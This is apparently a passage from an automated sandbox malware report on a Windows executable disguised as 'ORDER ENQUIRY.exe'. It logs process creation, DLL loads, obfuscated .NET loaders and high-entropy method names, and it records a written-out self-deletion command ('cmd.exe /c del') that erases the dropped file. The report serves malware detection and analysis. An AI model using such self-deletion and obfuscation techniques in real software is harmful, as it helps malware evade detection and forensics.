          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER ENQUIRY.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess created: C:\Users\user\Desktop\ORDER ENQUIRY.exe "C:\Users\user\Desktop\ORDER ENQUIRY.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER ENQUIRY.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: ORDER ENQUIRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ORDER ENQUIRY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: ORDER ENQUIRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: gTwj.pdb source: ORDER ENQUIRY.exe
          Source: Binary string: colorcpl.pdbGCTL source: ORDER ENQUIRY.exe, 00000003.00000002.2158318122.0000000001980000.00000040.10000000.00040000.00000000.sdmp, ORDER ENQUIRY.exe, 00000003.00000002.2157829388.0000000001628000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: ORDER ENQUIRY.exe, 00000003.00000002.2158318122.0000000001980000.00000040.10000000.00040000.00000000.sdmp, ORDER ENQUIRY.exe, 00000003.00000002.2157829388.0000000001628000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: ORDER ENQUIRY.exe, 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2156878359.000000000450B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2164752594.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ORDER ENQUIRY.exe, ORDER ENQUIRY.exe, 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000005.00000003.2156878359.000000000450B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2164752594.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: gTwj.pdbSHA256 source: ORDER ENQUIRY.exe

          Data Obfuscation

          barindex
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, oHjiQZkJuabU3f09BG.cs.Net Code: WbRNe2dWUs System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ORDER ENQUIRY.exe.7480000.3.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, oHjiQZkJuabU3f09BG.cs.Net Code: WbRNe2dWUs System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ORDER ENQUIRY.exe.41ca230.1.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ORDER ENQUIRY.exe.41e2450.0.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_015EE452 pushad ; iretd 0_2_015EE459
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_015EDAA2 pushad ; ret 0_2_015EDAA5
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_00417A63 push esi; iretd 3_2_00417A8C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_00416A0C push cs; ret 3_2_00416A24
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0040E2B5 push eax; retf 3_2_0040E2B6
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041D4F2 push eax; ret 3_2_0041D4F8
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041D4FB push eax; ret 3_2_0041D562
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041D4A5 push eax; ret 3_2_0041D4F8
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041D55C push eax; ret 3_2_0041D562
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB09AD push ecx; mov dword ptr [esp], ecx3_2_01AB09B6
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01A81368 push eax; iretd 3_2_01A81369
          Source: C:\Windows\explorer.exeCode function: 4_2_1069AB02 push esp; retn 0000h4_2_1069AB03
          Source: C:\Windows\explorer.exeCode function: 4_2_1069AB1E push esp; retn 0000h4_2_1069AB1F
          Source: C:\Windows\explorer.exeCode function: 4_2_1069A9B5 push esp; retn 0000h4_2_1069AAE7
          Source: C:\Windows\explorer.exeCode function: 4_2_10D389B5 push esp; retn 0000h4_2_10D38AE7
          Source: C:\Windows\explorer.exeCode function: 4_2_10D38B1E push esp; retn 0000h4_2_10D38B1F
          Source: C:\Windows\explorer.exeCode function: 4_2_10D38B02 push esp; retn 0000h4_2_10D38B03
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_000E1A6D push ecx; ret 5_2_000E1A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048909AD push ecx; mov dword ptr [esp], ecx5_2_048909B6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0287E2B5 push eax; retf 5_2_0287E2B6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288D4A5 push eax; ret 5_2_0288D4F8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288D4FB push eax; ret 5_2_0288D562
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288D4F2 push eax; ret 5_2_0288D4F8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288D55C push eax; ret 5_2_0288D562
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_02886A0C push cs; ret 5_2_02886A24
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_02887A63 push esi; iretd 5_2_02887A8C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0476E9B5 push esp; retn 0000h5_2_0476EAE7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0476EB1E push esp; retn 0000h5_2_0476EB1F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0476EB02 push esp; retn 0000h5_2_0476EB03
          Source: ORDER ENQUIRY.exeStatic PE information: section name: .text entropy: 7.71035451108767
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, CTaj1jy4xgrGq5RHHk.csHigh entropy of concatenated method names: 'Dispose', 'hkd7jEFGad', 'UhOrCfWRYb', 'iod66TEudB', 'N6I74Twih3', 'KiT7zeMtdZ', 'ProcessDialogKey', 'q7vr8fCpBl', 'Tser7fWrUu', 'hk2rr9Z5JR'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, QyI0xEwmLs04ImZyI1.csHigh entropy of concatenated method names: 'tfP7YC3T4X', 'mBd71VjTL6', 'nVI7VH3Tyx', 'Nag753eS1Z', 'Yt97OJZC5K', 'z3s7J8MAIR', 'wRIcdFM1S92C9diWiK', 'jIpBU4NwZqdRHiZb5f', 'HVe77FltPm', 'CU37TRcJ7a'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, a55VxBJyX8xc1ppeTh.csHigh entropy of concatenated method names: 'CuHnl4dv7X', 'TZSnCDMY8j', 'JinnodL6bY', 'IWanpB3uaO', 'BfLnf6RX4q', 'r6KnZygifx', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, CW1pMBhOUDii4MrnC7.csHigh entropy of concatenated method names: 'JXC37yjyOq', 'QVr3TRJtrq', 'hx03NHrJC2', 'T2v3h9OEXj', 'ued3aQHT9D', 'Pvf3IR5Wi2', 'zud3dqVi02', 'wtpnBlG8Hp', 'QRjnxgrIcV', 'XSinjvuYV8'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, g39uTpCX0vM1y2JMYw.csHigh entropy of concatenated method names: 'XChgx0kgAF', 'cQag4B9AHT', 'XDZn8ECfBP', 'Ps4n7IIWS7', 'zDYgc82700', 'GuJgQkrqnq', 'ItOgF2GfZT', 'LOAgfyJ8cE', 'gfUgUNni1p', 'KFlgSQr21l'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, foiGiGuDVbYuTHWVS4.csHigh entropy of concatenated method names: 'cUrgV8umDt', 'NIjg5gf0M2', 'ToString', 'wMDghP4IAL', 'l2Cgal3II3', 'OItgiNGm41', 'HwTgIx3xUe', 'V6Ugd6sK1i', 'mjpgYpxfLM', 'tD6g1rYc03'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, sYyXiJzPs8f6B0UTMQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LmI3wbotnP', 'KxM3OYHfqR', 'p8b3J0U34i', 'RSj3gP1sLc', 'IHo3nta8n5', 'zvt33oVctI', 'hHj39xk8uG'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, JQEmVVaTiWJ3o6gcRl.csHigh entropy of concatenated method names: 'Kc6YLng3cN', 'k7OYRaU70p', 'sFTYexeQxr', 'y0vYvZI6f6', 'yHgYDBNiAh', 'X7tYPmwd7Z', 'mMmYEjuGif', 'GmOYtoRqIH', 'TcgYyZmeyU', 'MBPYACNy1k'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, a9GUxVSCwgN5ZNwMVV.csHigh entropy of concatenated method names: 'KAbIDX3ryL', 'nbCIEHSuow', 'JR0io18WbM', 'j23iphbv92', 'ergiZU8V66', 'mI8i2i7THn', 'oqNisoRmb5', 'VQWi0qnf3g', 'qRJik3Iwb8', 'VpkiuGvXrV'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, oHjiQZkJuabU3f09BG.csHigh entropy of concatenated method names: 'TjETMeKTaX', 'HaYThmV1cT', 'zCATal6W3h', 'KM1TijSLyn', 'zkVTIWlf4L', 'koeTduWJFR', 'OV2TY23KKl', 'qgcT18JJ6p', 'MG0TXoamL0', 'yXxTVHdOJY'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, lCxoYEPk8fPYc32YtB.csHigh entropy of concatenated method names: 'jxxivqufkK', 'IL2iPnOBwe', 'GNkitGTXX8', 'v6Tiy5urxW', 'PjciOp03B7', 'IwLiJxSwYD', 'CeEigqVjh3', 'KdKin6VPJS', 'hr9i3f7bD9', 'LsBi9Ul106'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, dm7XQHq1x5DqqWtUDF.csHigh entropy of concatenated method names: 'wUlOuJ19VC', 'prpOQCLqZH', 'hCFOfAmllk', 'BFeOUJKKAO', 'fnROCC8Zq8', 'i1FOoqdyI6', 'AvBOpBcr9S', 'Mt9OZ1Snwv', 'w3WO2gtF0I', 'lx9OsDP9Xu'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, fXtQ0SsxXOEHo55xgTh.csHigh entropy of concatenated method names: 'foI3LOxbaN', 'vSK3RQS46P', 'oM03ew6Vfp', 'w4C3vAjN8r', 'vSE3DpPU9E', 'CbY3P9swN7', 'Yyt3Ef7VSF', 'PR33tAb5vL', 'aUa3yDlGE9', 'Jpj3A2E6ha'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, yMg9DBE5xlkLGF6884.csHigh entropy of concatenated method names: 'k2swtbD6OO', 'R5Ewyld23i', 'hs6wljFqSH', 'vmZwCgDPo6', 'Po6wp81t95', 'vaWwZ8UeIh', 'kmuws302Md', 'nbAw0y2g3M', 'ffHwuW7iA7', 'o5iwcc0mGx'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, cAfcQJsOqYr7bPf96KK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JN99fwMMQ5', 'neX9UePXEG', 'lWv9Spjq71', 'Xrd9Gtaotp', 'ePg9maUQsr', 'UcX9qufODi', 'rOY9BIZTkF'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, uyO80QM5DlYBNnlsDa.csHigh entropy of concatenated method names: 'eGNafWF1Yp', 'TQ9aUlmv0w', 'RIYaSdh4AI', 'ts5aGCthGH', 'f6QamvmyNR', 'CYfaqq6sn9', 'pF2aBPDynl', 'MFIaxTKd8D', 'MX8ajyMJUp', 'sdKa4s28NB'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, zCFGixj484S7Ql8D4f.csHigh entropy of concatenated method names: 'lKMYhIhac4', 'vicYiyem7Q', 'h6JYdvDjKu', 'iIrd4NFx2H', 'TgWdzdRhwt', 'TvvY8nlvDr', 'baoY7wweRL', 'DFnYr5nAqX', 'E2tYT3OtCx', 'Dn3YNtWTfi'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, f4rgMLZ4hwflUve3f2.csHigh entropy of concatenated method names: 'ihTnhAJukf', 'tCenaA2nMW', 'sZdni2MIhq', 'E6KnIomhNr', 'hDundMyA6b', 'GI8nYkc3w7', 'qMen1VR1sY', 'ArjnXSM4hA', 'riLnV2RiR5', 'VF4n5qsNb9'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, CSclcFcCtPnMCmOXGw.csHigh entropy of concatenated method names: 'JqWdMgOxsh', 'uGWdaAyLK4', 'XZ4dIYLsqp', 'ntUdY4oVF2', 'wIWd11QOxI', 'YdhImcbM4x', 'HVnIqjlK0b', 'ClsIBosXfY', 'WRjIxmQsHH', 'DPdIjHGma7'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, pRbfB1NeeV0ZSBUnrQ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ncXrjUiFvu', 'JQ1r4AhZFA', 'sHgrzrm3nS', 'POkT8lAE1W', 'f3AT7O9wD5', 'KTtTr2tpot', 'rwGTTEcapA', 't2Ga8qAHANk6UxeLh5b'
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, BQ8b6VfSVT1dlR2xSO.csHigh entropy of concatenated method names: 'ffQe339n6', 'KuDveSQSh', 'XgvP0OM0v', 'CbRETINHY', 'wEnyetTc4', 'gZoAagCwW', 'kVOOAuDeFH4YxJYAj6', 'SgYsgh4vVcWBiMgCml', 'r6DnZpJWK', 'v0n9AELQ1'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, CTaj1jy4xgrGq5RHHk.csHigh entropy of concatenated method names: 'Dispose', 'hkd7jEFGad', 'UhOrCfWRYb', 'iod66TEudB', 'N6I74Twih3', 'KiT7zeMtdZ', 'ProcessDialogKey', 'q7vr8fCpBl', 'Tser7fWrUu', 'hk2rr9Z5JR'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, QyI0xEwmLs04ImZyI1.csHigh entropy of concatenated method names: 'tfP7YC3T4X', 'mBd71VjTL6', 'nVI7VH3Tyx', 'Nag753eS1Z', 'Yt97OJZC5K', 'z3s7J8MAIR', 'wRIcdFM1S92C9diWiK', 'jIpBU4NwZqdRHiZb5f', 'HVe77FltPm', 'CU37TRcJ7a'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, a55VxBJyX8xc1ppeTh.csHigh entropy of concatenated method names: 'CuHnl4dv7X', 'TZSnCDMY8j', 'JinnodL6bY', 'IWanpB3uaO', 'BfLnf6RX4q', 'r6KnZygifx', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, CW1pMBhOUDii4MrnC7.csHigh entropy of concatenated method names: 'JXC37yjyOq', 'QVr3TRJtrq', 'hx03NHrJC2', 'T2v3h9OEXj', 'ued3aQHT9D', 'Pvf3IR5Wi2', 'zud3dqVi02', 'wtpnBlG8Hp', 'QRjnxgrIcV', 'XSinjvuYV8'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, g39uTpCX0vM1y2JMYw.csHigh entropy of concatenated method names: 'XChgx0kgAF', 'cQag4B9AHT', 'XDZn8ECfBP', 'Ps4n7IIWS7', 'zDYgc82700', 'GuJgQkrqnq', 'ItOgF2GfZT', 'LOAgfyJ8cE', 'gfUgUNni1p', 'KFlgSQr21l'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, foiGiGuDVbYuTHWVS4.csHigh entropy of concatenated method names: 'cUrgV8umDt', 'NIjg5gf0M2', 'ToString', 'wMDghP4IAL', 'l2Cgal3II3', 'OItgiNGm41', 'HwTgIx3xUe', 'V6Ugd6sK1i', 'mjpgYpxfLM', 'tD6g1rYc03'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, sYyXiJzPs8f6B0UTMQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LmI3wbotnP', 'KxM3OYHfqR', 'p8b3J0U34i', 'RSj3gP1sLc', 'IHo3nta8n5', 'zvt33oVctI', 'hHj39xk8uG'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, JQEmVVaTiWJ3o6gcRl.csHigh entropy of concatenated method names: 'Kc6YLng3cN', 'k7OYRaU70p', 'sFTYexeQxr', 'y0vYvZI6f6', 'yHgYDBNiAh', 'X7tYPmwd7Z', 'mMmYEjuGif', 'GmOYtoRqIH', 'TcgYyZmeyU', 'MBPYACNy1k'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, a9GUxVSCwgN5ZNwMVV.csHigh entropy of concatenated method names: 'KAbIDX3ryL', 'nbCIEHSuow', 'JR0io18WbM', 'j23iphbv92', 'ergiZU8V66', 'mI8i2i7THn', 'oqNisoRmb5', 'VQWi0qnf3g', 'qRJik3Iwb8', 'VpkiuGvXrV'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, oHjiQZkJuabU3f09BG.csHigh entropy of concatenated method names: 'TjETMeKTaX', 'HaYThmV1cT', 'zCATal6W3h', 'KM1TijSLyn', 'zkVTIWlf4L', 'koeTduWJFR', 'OV2TY23KKl', 'qgcT18JJ6p', 'MG0TXoamL0', 'yXxTVHdOJY'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, lCxoYEPk8fPYc32YtB.csHigh entropy of concatenated method names: 'jxxivqufkK', 'IL2iPnOBwe', 'GNkitGTXX8', 'v6Tiy5urxW', 'PjciOp03B7', 'IwLiJxSwYD', 'CeEigqVjh3', 'KdKin6VPJS', 'hr9i3f7bD9', 'LsBi9Ul106'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, dm7XQHq1x5DqqWtUDF.csHigh entropy of concatenated method names: 'wUlOuJ19VC', 'prpOQCLqZH', 'hCFOfAmllk', 'BFeOUJKKAO', 'fnROCC8Zq8', 'i1FOoqdyI6', 'AvBOpBcr9S', 'Mt9OZ1Snwv', 'w3WO2gtF0I', 'lx9OsDP9Xu'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, fXtQ0SsxXOEHo55xgTh.csHigh entropy of concatenated method names: 'foI3LOxbaN', 'vSK3RQS46P', 'oM03ew6Vfp', 'w4C3vAjN8r', 'vSE3DpPU9E', 'CbY3P9swN7', 'Yyt3Ef7VSF', 'PR33tAb5vL', 'aUa3yDlGE9', 'Jpj3A2E6ha'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, yMg9DBE5xlkLGF6884.csHigh entropy of concatenated method names: 'k2swtbD6OO', 'R5Ewyld23i', 'hs6wljFqSH', 'vmZwCgDPo6', 'Po6wp81t95', 'vaWwZ8UeIh', 'kmuws302Md', 'nbAw0y2g3M', 'ffHwuW7iA7', 'o5iwcc0mGx'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, cAfcQJsOqYr7bPf96KK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JN99fwMMQ5', 'neX9UePXEG', 'lWv9Spjq71', 'Xrd9Gtaotp', 'ePg9maUQsr', 'UcX9qufODi', 'rOY9BIZTkF'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, uyO80QM5DlYBNnlsDa.csHigh entropy of concatenated method names: 'eGNafWF1Yp', 'TQ9aUlmv0w', 'RIYaSdh4AI', 'ts5aGCthGH', 'f6QamvmyNR', 'CYfaqq6sn9', 'pF2aBPDynl', 'MFIaxTKd8D', 'MX8ajyMJUp', 'sdKa4s28NB'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, zCFGixj484S7Ql8D4f.csHigh entropy of concatenated method names: 'lKMYhIhac4', 'vicYiyem7Q', 'h6JYdvDjKu', 'iIrd4NFx2H', 'TgWdzdRhwt', 'TvvY8nlvDr', 'baoY7wweRL', 'DFnYr5nAqX', 'E2tYT3OtCx', 'Dn3YNtWTfi'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, f4rgMLZ4hwflUve3f2.csHigh entropy of concatenated method names: 'ihTnhAJukf', 'tCenaA2nMW', 'sZdni2MIhq', 'E6KnIomhNr', 'hDundMyA6b', 'GI8nYkc3w7', 'qMen1VR1sY', 'ArjnXSM4hA', 'riLnV2RiR5', 'VF4n5qsNb9'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, CSclcFcCtPnMCmOXGw.csHigh entropy of concatenated method names: 'JqWdMgOxsh', 'uGWdaAyLK4', 'XZ4dIYLsqp', 'ntUdY4oVF2', 'wIWd11QOxI', 'YdhImcbM4x', 'HVnIqjlK0b', 'ClsIBosXfY', 'WRjIxmQsHH', 'DPdIjHGma7'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, pRbfB1NeeV0ZSBUnrQ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ncXrjUiFvu', 'JQ1r4AhZFA', 'sHgrzrm3nS', 'POkT8lAE1W', 'f3AT7O9wD5', 'KTtTr2tpot', 'rwGTTEcapA', 't2Ga8qAHANk6UxeLh5b'
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, BQ8b6VfSVT1dlR2xSO.csHigh entropy of concatenated method names: 'ffQe339n6', 'KuDveSQSh', 'XgvP0OM0v', 'CbRETINHY', 'wEnyetTc4', 'gZoAagCwW', 'kVOOAuDeFH4YxJYAj6', 'SgYsgh4vVcWBiMgCml', 'r6DnZpJWK', 'v0n9AELQ1'
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
